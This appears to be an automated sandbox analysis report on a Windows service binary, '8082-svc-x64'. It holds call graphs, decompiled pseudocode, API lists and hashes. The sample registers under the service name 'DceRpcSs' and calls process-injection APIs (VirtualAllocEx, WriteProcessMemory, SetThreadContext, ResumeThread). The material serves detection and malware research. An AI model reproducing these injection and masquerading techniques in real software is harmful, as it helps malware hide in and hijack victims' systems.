858 401e5a 858->859 860 401ef5 RtlAddFunctionTable 858->860 861 402b60 859->861 860->859 862 401283 GetProcAddress 861->862 864 402b80 861->864 862->831 863 402c10 LoadLibraryW 863->862 864->863 865 402bf4 GetModuleHandleA 864->865 865->862 866 402c0d 865->866 866->863 868 403391 867->868 869 40339f StartServiceCtrlDispatcherA 868->869 869->833 871 4022fd 870->871 875 402310 870->875 871->840 872 4024e7 873 402270 10 API calls 872->873 874 4024fd 873->874 878 402270 10 API calls 874->878 875->872 879 4023c7 875->879 881 40236c 875->881 876 4023d7 VirtualQuery 877 40251a 876->877 876->879 880 402270 10 API calls 877->880 878->877 879->876 882 402475 VirtualProtect memcpy 879->882 886 402425 VirtualProtect 879->886 890 40252e 880->890 883 402392 VirtualQuery 881->883 882->871 884 4024b1 882->884 883->874 883->879 884->871 885 4024ba VirtualProtect 884->885 885->840 886->879 888 402449 GetLastError 886->888 887 402549 887->840 889 402270 10 API calls 888->889 889->879 890->887 891 4026b9 890->891 895 4025d1 890->895 891->887 892 402827 891->892 897 402606 891->897 899 4022e0 10 API calls 891->899 900 402270 10 API calls 891->900 894 402270 10 API calls 892->894 893 4022e0 10 API calls 893->895 896 402833 894->896 895->887 895->893 895->897 897->887 898 402653 VirtualQuery 897->898 901 402809 898->901 902 40266d VirtualProtect 898->902 899->891 900->891 903 402270 10 API calls 901->903 902->897 903->892 905 402297 904->905 906 4022b2 __iob_func 905->906 910 4022cb 906->910 907 4022fd 907->845 908 4024e7 909 402270 9 API calls 908->909 911 4024fd 909->911 910->907 910->908 915 4023c7 910->915 917 40236c 910->917 914 402270 9 API calls 911->914 912 4023d7 VirtualQuery 913 40251a 912->913 912->915 916 402270 9 API calls 913->916 914->913 915->912 918 402475 VirtualProtect memcpy 915->918 922 402425 VirtualProtect 915->922 926 40252e 916->926 919 402392 VirtualQuery 917->919 918->907 920 4024b1 918->920 919->911 919->915 920->907 921 4024ba VirtualProtect 920->921 921->845 922->915 924 402449 GetLastError 922->924 923 402549 923->845 925 402270 9 API calls 924->925 925->915 926->923 930 4025d1 926->930 934 4026b9 926->934 927 402827 929 402270 9 API calls 927->929 928 4022e0 9 API calls 928->930 931 402833 929->931 930->923 930->928 932 402606 930->932 932->923 933 402653 VirtualQuery 932->933 936 402809 933->936 937 40266d VirtualProtect 933->937 934->923 934->927 934->932 935 402270 9 API calls 934->935 938 4022e0 9 API calls 934->938 935->934 939 402270 9 API calls 936->939 937->932 938->934 939->927 941 4028d1 940->941 942 402929 strncmp 941->942 943 40293e 941->943 942->941 942->943 943->858 1061 401c70 1062 401cc0 1061->1062 1063 401c7e 1061->1063 1066 401ccd 1062->1066 1071 401d44 1062->1071 1064 401cf0 1063->1064 1065 401c85 signal 1063->1065 1068 401ca3 1064->1068 1069 401d01 1064->1069 1064->1071 1067 401dc0 signal 1065->1067 1065->1068 1066->1065 1066->1068 1067->1068 1069->1068 1070 401d13 signal 1069->1070 1070->1068 1072 401de6 signal 1070->1072 1071->1068 1073 401df7 signal 1071->1073 1072->1068 1074 401af0 1075 401aff 1074->1075 1076 403060 5 API calls 1075->1076 1077 401b13 1075->1077 1076->1077 1080 401a37 RegisterServiceCtrlHandlerA 1081 401ab1 1080->1081 1082 401aa1 1080->1082 1085 401955 GetTickCount 1082->1085 1086 403198 1085->1086 1087 4019c3 CreateThread 1086->1087

          Callgraph

          • Executed
          • Not Executed
          • Opacity -> Relevance
          • Disassembly available
          callgraph 0 Function_00402840 1 Function_00402240 2 Function_00402C40 3 Function_00402F40 4 Function_00402FC0 5 Function_004028C0 5->0 6 Function_00401AC0 26 Function_00403060 6->26 7 Function_00403141 8 Function_00401845 54 Function_00401790 8->54 9 Function_0040174A 36 Function_004014F0 9->36 10 Function_0044B348 11 Function_00402250 12 Function_00402A50 12->0 13 Function_00401C50 60 Function_00401BA0 13->60 14 Function_00402ED0 15 Function_004014D0 37 Function_00402D00 15->37 41 Function_00401180 15->41 16 Function_004029D0 16->0 17 Function_00402AD0 17->0 32 Function_00402870 17->32 18 Function_00402DD0 19 Function_004031D1 20 Function_00401955 21 Function_00403158 22 Function_00402960 22->0 23 Function_00402B60 23->17 24 Function_00402260 25 Function_00401060 25->24 55 Function_00401B90 25->55 26->14 27 Function_00401B60 28 Function_004022E0 28->12 28->22 28->28 31 Function_00402270 28->31 38 Function_00403100 28->38 61 Function_004029A0 28->61 29 Function_00402CE0 30 Function_00401862 31->12 31->22 31->28 31->31 31->38 31->61 33 Function_00401B70 34 Function_00401C70 66 Function_00402C30 34->66 35 Function_00401AF0 35->26 39 Function_00402A80 39->0 39->32 40 Function_00401A00 41->23 41->29 51 Function_00401E10 41->51 53 Function_00403390 41->53 65 Function_00402530 41->65 41->66 42 Function_00402180 43 Function_00401B80 44 Function_00401902 44->9 44->30 45 Function_00402202 46 Function_00403382 46->29 47 Function_00401588 64 Function_0040152B 47->64 48 Function_00403309 49 Function_00403289 50 Function_00401010 51->5 51->12 51->16 52 Function_00402210 53->29 56 Function_00403191 57 Function_0044B410 58 Function_00401F20 58->66 59 Function_00402220 60->43 60->55 61->0 62 Function_00401628 62->47 63 Function_004031A9 65->28 65->31 65->38 65->61 67 Function_00402130 68 Function_00402230 69 Function_004014B0 69->37 69->41 70 Function_00401A37 70->20

          Control-flow Graph

          C-Code - Quality: 56%
          			E00401180(void* __ebx, void* __edi, void* __ebp, void* __esp, void* __rbx, signed int __rcx, void* __rdi, void* __rsi, void* __rbp, void* __r8, void* __r9, void* __r12) {
          				signed short _v100;
          				signed int _v104;
          				char _v152;
          				_Unknown_base(*)()* _t29;
          				intOrPtr _t34;
          				void* _t36;
          				signed int _t40;
          				void* _t43;
          				signed int _t50;
          				signed int _t54;
          				signed int _t55;
          				void* _t57;
          				signed int _t58;
          				signed int _t59;
          				void* _t61;
          				void* _t63;
          				intOrPtr _t80;
          				signed long long _t81;
          				void* _t84;
          				signed long long _t86;
          				signed int _t88;
          				signed long long _t92;
          				signed int _t96;
          				long long _t97;
          				void* _t103;
          				signed long long _t104;
          				signed long long _t107;
          				void* _t114;
          				intOrPtr _t115;
          				void* _t117;
          
          				_t118 = __r12;
          				_t117 = __r9;
          				_t114 = __r8;
          				_t103 = __rsi;
          				_t88 = __rcx;
          				_t61 = __ebp;
          				_t43 = __ebx;
          				_push(__r12);
          				_push(__rbp);
          				_push(__rdi);
          				_push(__rsi);
          				_push(__rbx);
          				r11d =  *0x44a070;
          				_t96 =  &_v152;
          				_t101 = _t96;
          				memset(__edi, 0, 0xd << 0);
          				_t63 = __esp + 0xc;
          				_t57 = __edi + 0xd;
          				if(r11d != 0) {
          					_t88 = _t96;
          					GetStartupInfoA(??);
          				}
          				_t80 =  *[gs:0x30];
          				_t86 =  *((intOrPtr*)(_t80 + 8));
          				asm("lock dec eax");
          				_t59 = 0;
          				if(_t80 == 0) {
          					L7:
          					if( *0x44aa30 == 1) {
          						goto L38;
          					} else {
          						goto L8;
          					}
          				} else {
          					sil = 1;
          					if(_t86 != _t80) {
          						_t101 = Sleep;
          						while(1) {
          							Sleep();
          							_t84 = _t103;
          							asm("lock dec eax");
          							if(_t84 == 0) {
          								break;
          							}
          							__eflags = _t86 - _t84;
          							if(_t86 == _t84) {
          								_t59 = 1;
          								__eflags =  *0x44aa30 - 1;
          								if( *0x44aa30 != 1) {
          									L8:
          									if( *0x44aa30 == 0) {
          										_t96 = 0x44c030;
          										_t88 = 0x44c018;
          										 *0x44aa30 = 1;
          										L00403180();
          									} else {
          										 *0x44a000 = 1;
          									}
          									_t24 =  *0x44aa30;
          									if( *0x44aa30 == 1) {
          										goto L40;
          									}
          								} else {
          									L38:
          									L00403178();
          									_t24 =  *0x44aa30;
          									__eflags =  *0x44aa30 - 1;
          									if( *0x44aa30 == 1) {
          										L40:
          										_t96 = 0x44c010;
          										_t88 = 0x44c000;
          										L00403180();
          										 *0x44aa30 = 2;
          									}
          								}
          								goto L11;
          								L32:
          								 *((long long*)(_t107 + _t81)) = 0;
          								 *0x44a008 = _t107;
          								E00402CE0(_t86, _t97, _t104);
          								 *__imp____initenv =  *0x44a010;
          								_t115 =  *0x44a010;
          								_t34 = E00403390(_t58, _t63, __eflags, _t92); // executed
          								r9d =  *0x44a01c;
          								 *0x44a018 = _t34;
          								__eflags = r9d;
          								if(r9d == 0) {
          									L00403188(); // executed
          									asm("o16 nop [eax+eax]");
          									 *0x44a070 = 1;
          									E00402D00(_t34); // executed
          									_t36 = E00401180(_t43, _t58, _t61, _t63, _t86, _t92, _t101, _t104, _t107, _t115, _t117, _t118); // executed
          									return _t36;
          								} else {
          									r8d =  *0x44a000;
          									__eflags = r8d;
          									if(r8d == 0) {
          										L00403170();
          										_t34 =  *0x44a018;
          									}
          									return _t34;
          								}
          							} else {
          								continue;
          							}
          							goto L11;
          						}
          						_t59 = 0;
          					}
          					goto L7;
          				}
          				L11:
          				if(_t59 == 0) {
          					_t24 = 0;
          					asm("lock dec eax");
          				}
          				_t81 =  *0x446400;
          				if(_t81 != 0) {
          					r8d = 0;
          					_t24 =  *_t81();
          				}
          				E00402530(_t24, _t43, _t81, _t86, _t88, _t101, _t103, _t114, _t118);
          				SetUnhandledExceptionFilter(??);
          				 *0x44a0a0 = _t81;
          				E00402B60(E00401E10(2, _t57, _t63, 0, _t81, E00401F20, _t96), E00401F20);
          				_t97 = "_set_invalid_parameter_handler";
          				_t29 = GetProcAddress(??, ??);
          				if(_t81 != 0) {
          					_t29 =  *_t81();
          				}
          				E00402C30(_t29);
          				r10d =  *0x44a070;
          				if(r10d != 0) {
          					_t50 = 0;
          					_t81 =  *__imp___acmdln;
          					while(1) {
          						_t54 =  *_t81 & 0x000000ff;
          						if(_t54 <= 0x20) {
          							goto L19;
          						}
          						r8d = _t50;
          						r8d = r8d ^ 0x00000001;
          						_t50 =  ==  ? r8d : _t50;
          						L21:
          						_t81 = _t81 + 1;
          						continue;
          						L19:
          						__eflags = _t54;
          						if(_t54 != 0) {
          							__eflags = _t50;
          							if(_t50 == 0) {
          								while(1) {
          									_t81 = _t81 + 1;
          									_t55 =  *_t81 & 0x000000ff;
          									__eflags = _t55 - 0x20;
          									if(_t55 > 0x20) {
          										goto L26;
          									}
          									__eflags = _t55;
          									if(_t55 != 0) {
          										continue;
          									}
          									goto L26;
          								}
          							} else {
          								goto L21;
          							}
          						}
          						L26:
          						__eflags = _v104 & 0x00000001;
          						_t97 = 0x400000;
          						 *0x44a990 = _t81;
          						_t40 = 0xa;
          						 *0x44a9a0 = 0x400000;
          						if((_v104 & 0x00000001) != 0) {
          							_t40 = _v100 & 0x0000ffff;
          						}
          						 *0x44a998 = _t40;
          						goto L28;
          					}
          				}
          				L28:
          				_t58 =  *0x44a004;
          				_t92 = _t101 + 1 << 3;
          				malloc(??);
          				_t107 = _t81;
          				__eflags = _t58;
          				_t104 =  *0x44a008;
          				if(_t58 > 0) {
          					_t43 = 0;
          					asm("o16 nop [cs:eax+eax]");
          					do {
          						strlen();
          						_t12 = _t81 + 1; // 0x1
          						r12d = _t12;
          						_t118 = r12d;
          						malloc(??);
          						 *(_t107 + _t86 * 8) = _t81;
          						_t97 =  *((intOrPtr*)(_t104 + _t86 * 8));
          						_t92 = _t81;
          						_t86 = _t86 + 1;
          						memcpy(??, ??, ??);
          						__eflags = _t58;
          					} while (_t58 > 0);
          					_t101 = _t58;
          					_t81 = _t58 * 8;
          				}
          				goto L32;
          			}

































          0x00401180
          0x00401180
          0x00401180
          0x00401180
          0x00401180
          0x00401180
          0x00401180
          0x00401180
          0x00401182
          0x00401183
          0x00401184
          0x00401185
          0x0040118d
          0x0040119b
          0x004011a3
          0x004011a6
          0x004011a6
          0x004011a6
          0x004011a9
          0x00401472
          0x00401475
          0x00401475
          0x004011af
          0x004011b8
          0x004011be
          0x004011c7
          0x004011cc
          0x00401204
          0x0040120d
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004011ce
          0x004011d1
          0x004011d4
          0x004011d6
          0x004011ea
          0x004011ef
          0x004011f1
          0x004011f4
          0x00401200
          0x00000000
          0x00000000
          0x004011e1
          0x004011e4
          0x00401426
          0x0040142b
          0x0040142e
          0x00401213
          0x0040121b
          0x00401480
          0x00401487
          0x0040148e
          0x00401498
          0x00401221
          0x00401221
          0x00401221
          0x0040122b
          0x00401234
          0x00000000
          0x00000000
          0x00401434
          0x00401434
          0x00401439
          0x0040143e
          0x00401444
          0x00401447
          0x00401450
          0x00401450
          0x00401457
          0x0040145e
          0x00401463
          0x00401463
          0x00401447
          0x00000000
          0x0040138f
          0x0040138f
          0x00401398
          0x0040139f
          0x004013b8
          0x004013bb
          0x004013c9
          0x004013ce
          0x004013d5
          0x004013db
          0x004013de
          0x004014a4
          0x004014aa
          0x004014b4
          0x004014be
          0x004014c3
          0x004014ce
          0x004013e4
          0x004013e4
          0x004013eb
          0x004013ee
          0x004013f0
          0x004013f5
          0x004013f5
          0x00401408
          0x00401408
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004011e4
          0x00401202
          0x00401202
          0x00000000
          0x004011d4
          0x0040123a
          0x0040123c
          0x0040123e
          0x00401240
          0x00401240
          0x00401248
          0x00401252
          0x00401254
          0x0040125e
          0x0040125e
          0x00401260
          0x0040126c
          0x00401272
          0x0040127e
          0x00401283
          0x0040128d
          0x00401296
          0x0040129f
          0x0040129f
          0x004012a1
          0x004012a6
          0x004012b0
          0x004012b9
          0x004012bb
          0x004012cc
          0x004012cc
          0x004012d2
          0x00000000
          0x00000000
          0x004012d4
          0x004012d7
          0x004012de
          0x004012c8
          0x004012c8
          0x00000000
          0x004012c0
          0x004012c0
          0x004012c2
          0x004012c4
          0x004012c6
          0x004012e8
          0x004012e8
          0x004012ec
          0x004012ef
          0x004012f2
          0x00000000
          0x00000000
          0x004012e4
          0x004012e6
          0x00000000
          0x00000000
          0x00000000
          0x004012e6
          0x00000000
          0x00000000
          0x00000000
          0x004012c6
          0x004012f4
          0x004012f4
          0x004012f9
          0x00401300
          0x00401307
          0x0040130c
          0x00401313
          0x00401410
          0x00401410
          0x00401319
          0x00000000
          0x00401319
          0x004012cc
          0x0040131f
          0x0040131f
          0x0040132b
          0x0040132f
          0x00401334
          0x00401339
          0x0040133b
          0x00401342
          0x00401344
          0x00401346
          0x00401350
          0x00401354
          0x00401359
          0x00401359
          0x0040135d
          0x00401363
          0x00401368
          0x0040136d
          0x00401374
          0x00401377
          0x0040137b
          0x00401380
          0x00401380
          0x00401384
          0x00401387
          0x00401387
          0x00000000

          APIs
          Strings
          • _set_invalid_parameter_handler, xrefs: 00401283
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: malloc$AddressExceptionFilterInfoProcSleepStartupUnhandled_cexitmemcpystrlen
          • String ID: _set_invalid_parameter_handler
          • API String ID: 2757201259-2374863361
          • Opcode ID: 6bca19a444dcb599eed501cc204cc1285a57f394ab86a08b83fea6ca28c91eac
          • Instruction ID: 3334388251c753aec3277e1e1e3555ada3c10960b61d3fd564361280445ad126
          • Opcode Fuzzy Hash: 6bca19a444dcb599eed501cc204cc1285a57f394ab86a08b83fea6ca28c91eac
          • Instruction Fuzzy Hash: 2A71BDB121164086FB24DF66E98036A23A1FB48789F84403BDE09A77B1DF3DC855C78E
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 57 403382-40338b 58 403391-40339a call 402ce0 57->58 59 40338d 57->59 61 40339f-4033d2 StartServiceCtrlDispatcherA 58->61 59->58
          C-Code - Quality: 82%
          			E00403382(void* __edx, void* __edi, void* __esp, void* __rax, void* __rdi) {
          				void* _v32;
          				long long _v36;
          				long long _v44;
          				void* _t21;
          				void* _t31;
          				void* _t33;
          				void* _t37;
          
          				_t21 = __edi;
          				_t2 = __rax - 0xdda0070;
          				 *_t2 =  *((intOrPtr*)(__rax - 0xdda0070)) + __edx;
          				if( *_t2 <= 0) {
          					 *((intOrPtr*)(__rax - 0x7cb7a870)) =  *((intOrPtr*)(__rax - 0x7cb7a870)) + __edx;
          				}
          				E00402CE0(_t31, _t33, _t37);
          				memset(_t21, 0, 8 << 2);
          				_v36 = 0x401a37;
          				_v44 = "DceRpcSs";
          				StartServiceCtrlDispatcherA(??); // executed
          				return 0;
          			}










          0x00403382
          0x00403385
          0x00403385
          0x0040338b
          0x0040338d
          0x00403390
          0x0040339a
          0x004033a6
          0x004033b4
          0x004033c0
          0x004033c5
          0x004033d2

          APIs
          • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004033C5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: CtrlDispatcherServiceStart
          • String ID: DceRpcSs
          • API String ID: 3789849863-292928688
          • Opcode ID: 558def045d8161e24f5e96737786dab97534d7856f2bd45d8542ff1325b826b9
          • Instruction ID: ab4b005ad07a54ae36cfd2e19f7d5d034851c5357c3a9c43dbfc4619b985bd03
          • Opcode Fuzzy Hash: 558def045d8161e24f5e96737786dab97534d7856f2bd45d8542ff1325b826b9
          • Instruction Fuzzy Hash: 98F0826270DF8196DB218724F95434A7BA0F388348F840226D3CC53764EF7CC216C704
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 62 403390-4033d2 call 402ce0 StartServiceCtrlDispatcherA
          C-Code - Quality: 82%
          			E00403390(void* __edi, void* __esp, void* __eflags, void* __rcx) {
          				void* _v40;
          				long long _v44;
          				long long _v52;
          				void* _t22;
          				void* _t25;
          				void* _t27;
          
          				E00402CE0(_t22, _t25, _t27);
          				memset(__edi, 0, 8 << 2);
          				_v44 = 0x401a37;
          				_v52 = "DceRpcSs";
          				StartServiceCtrlDispatcherA(??); // executed
          				return 0;
          			}









          0x0040339a
          0x004033a6
          0x004033b4
          0x004033c0
          0x004033c5
          0x004033d2

          APIs
          • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004033C5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: CtrlDispatcherServiceStart
          • String ID: DceRpcSs
          • API String ID: 3789849863-292928688
          • Opcode ID: 8359b0af28ad481c956054c4096c9acb40ceac683c1f8d142bc70995b950a724
          • Instruction ID: fcaf18e96a372c61e70ff033227e88cbc94a734f425085a6b3f7b80b0ad731b7
          • Opcode Fuzzy Hash: 8359b0af28ad481c956054c4096c9acb40ceac683c1f8d142bc70995b950a724
          • Instruction Fuzzy Hash: 7DE04662218B8492EB608B20F90434A73E4F788388F800232D38D927B4EF7CC259CB08
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • RtlCaptureContext.KERNEL32 ref: 00402DE4
          • RtlLookupFunctionEntry.KERNEL32 ref: 00402DFB
          • RtlVirtualUnwind.KERNEL32 ref: 00402E3D
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00402E84
          • UnhandledExceptionFilter.KERNEL32 ref: 00402E91
          • GetCurrentProcess.KERNEL32 ref: 00402E97
          • TerminateProcess.KERNEL32 ref: 00402EA5
          • abort.MSVCRT ref: 00402EAB
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
          • String ID:
          • API String ID: 4278921479-0
          • Opcode ID: 3c9f7b0cbb3a5e97d00706347cbff4cee23c81c9743578c882c86815ceeaede0
          • Instruction ID: c244d03a489efcc9ac431e2de51b1c2ad014b87b5a9885a75f54b0b38ce00f5f
          • Opcode Fuzzy Hash: 3c9f7b0cbb3a5e97d00706347cbff4cee23c81c9743578c882c86815ceeaede0
          • Instruction Fuzzy Hash: C221EFB1251F0099FB009F62F88838937B8FB09BA8F54012AEE4E17764EF78C565C749
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • GetSystemTimeAsFileTime.KERNEL32 ref: 00402D45
          • GetCurrentProcessId.KERNEL32 ref: 00402D50
          • GetCurrentThreadId.KERNEL32 ref: 00402D58
          • GetTickCount.KERNEL32 ref: 00402D60
          • QueryPerformanceCounter.KERNEL32 ref: 00402D6D
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
          • String ID:
          • API String ID: 1445889803-0
          • Opcode ID: fecc7836c2f8edbb03cda3874c73d18ec24d76a7d701b3421ed88593aa68e5d3
          • Instruction ID: 75664d232f38a149bdc014f96ab221725e5cf7ea51f5dae11f28f0bb7d324961
          • Opcode Fuzzy Hash: fecc7836c2f8edbb03cda3874c73d18ec24d76a7d701b3421ed88593aa68e5d3
          • Instruction Fuzzy Hash: BC115EA6226B1086FB515F66F9087592260F74ABB5F481639EE9D067E0DF3CC885C708
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: NamedPipe$CloseConnectCreateHandle
          • String ID:
          • API String ID: 2614152119-0
          • Opcode ID: ef9a6366ed5f962c171c155b8fd7ceca6f620fbf907e872f5f9c7595713b106f
          • Instruction ID: 206f06ffe5a766268793747635b52d486af52f2bb13f1d073d91c39b3656a8d0
          • Opcode Fuzzy Hash: ef9a6366ed5f962c171c155b8fd7ceca6f620fbf907e872f5f9c7595713b106f
          • Instruction Fuzzy Hash: D811E572710A4086E7209B22E80874BB7A0F784BE4F189331EE5947BE4DF7DC545CB88
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAllocEx.KERNEL32 ref: 004015B5
          • WriteProcessMemory.KERNEL32 ref: 004015D4
          • VirtualProtectEx.KERNEL32 ref: 004015FF
            • Part of subcall function 0040152B: GetThreadContext.KERNEL32 ref: 0040154C
            • Part of subcall function 0040152B: SetThreadContext.KERNEL32 ref: 0040156B
            • Part of subcall function 0040152B: ResumeThread.KERNEL32 ref: 00401578
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: Thread$ContextVirtual$AllocMemoryProcessProtectResumeWrite
          • String ID:
          • API String ID: 2510746765-0
          • Opcode ID: c5f3dc5982a54dcdb75ab6b83312de3820264c33d39150086afca4a52f716843
          • Instruction ID: 0b1f64976b4b43bd86d7fc027b595fdf565bd9e8de0105609dff1cfeef292252
          • Opcode Fuzzy Hash: c5f3dc5982a54dcdb75ab6b83312de3820264c33d39150086afca4a52f716843
          • Instruction Fuzzy Hash: B001BCA2301B8096DA10DB52F808B9AA321F799FD4F888132EF8D17B49DF7CC249C704
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 71 4022e0-4022fb 72 402310-402318 71->72 73 4022fd-40230c 71->73 74 4024e7 72->74 75 40231e-402327 72->75 77 4024ee-4024f8 call 402270 74->77 76 402330-402337 75->76 78 402339-402347 76->78 79 40234d-402356 76->79 83 4024fd-402515 call 402270 77->83 78->79 81 402460-402467 78->81 79->76 82 402358-402366 call 402960 79->82 85 4023d7-4023ea VirtualQuery 81->85 82->77 93 40236c-4023c1 call 402a50 VirtualQuery 82->93 87 40251a-402547 call 402270 83->87 86 4023f0-4023f7 85->86 85->87 90 402470-402473 86->90 91 4023f9-40240f 86->91 105 402554-4025ab call 4029a0 call 403100 87->105 106 402549-402553 87->106 90->91 95 402475-4024ab VirtualProtect memcpy 90->95 98 402420-402423 91->98 93->83 102 4023c7-4023ce 93->102 95->73 100 4024b1-4024b4 95->100 103 4023d0 98->103 104 402425-402447 VirtualProtect 98->104 100->73 101 4024ba-4024e6 VirtualProtect 100->101 102->98 102->103 103->85 104->103 108 402449-40245d GetLastError call 402270 104->108 105->106 114 4025ad-4025b1 105->114 108->81 115 4026a0-4026a6 114->115 116 4025b7-4025bf 114->116 117 4025d1-4025d4 115->117 118 4026ac-4026b3 115->118 116->117 119 4025c1-4025cb 116->119 117->106 122 4025da 117->122 118->117 120 4026b9-4026bf 118->120 119->117 121 402688-402692 119->121 124 4026c5-4026cc 120->124 125 402827-402833 call 402270 120->125 121->120 123 402694-40269b 121->123 126 4025e1-402604 call 4022e0 122->126 123->115 124->106 127 4026d2-4026d9 124->127 135 402606-40260e 126->135 130 4026e3-4026fc 127->130 133 402756-402761 130->133 134 4026fe 130->134 136 402763-402770 133->136 137 402785-402792 133->137 138 402700-402703 134->138 139 402721-402724 134->139 135->106 140 402614-402626 135->140 141 402774-402783 call 4022e0 136->141 137->141 142 402794 137->142 143 4027d9-4027e1 138->143 144 402709-40271c call 402270 138->144 146 40272a-40272d 139->146 147 4027ac-4027b6 139->147 145 402643-402651 140->145 164 402748-40274f 141->164 154 4027f6-4027f9 142->154 155 402796-402799 142->155 143->137 152 4027e3-4027f4 143->152 144->139 148 402630-40263d 145->148 149 402653-402667 VirtualQuery 145->149 146->144 150 40272f-402735 146->150 147->137 151 4027b8-4027c1 147->151 148->106 148->145 157 402809-402822 call 402270 149->157 158 40266d-402686 VirtualProtect 149->158 159 402739-402743 call 4022e0 150->159 160 4027c5-4027d4 call 4022e0 151->160 161 40279b-4027aa call 4022e0 152->161 154->160 162 4027fb-4027fe 154->162 155->161 155->164 157->125 158->148 159->164 160->164 161->164 162->164 168 402804 162->168 164->130 167 402751 164->167 167->135 168->159
          C-Code - Quality: 44%
          			E004022E0(intOrPtr __eax, void* __rbx, signed long long __rcx, intOrPtr __rdx, void* __rdi, void* __rsi, intOrPtr __r8, long long __r12, signed long long __r13, long long _a8, long long _a16) {
          				void* _v40;
          				char _v44;
          				signed long long _v56;
          				signed int _v60;
          				void* _v80;
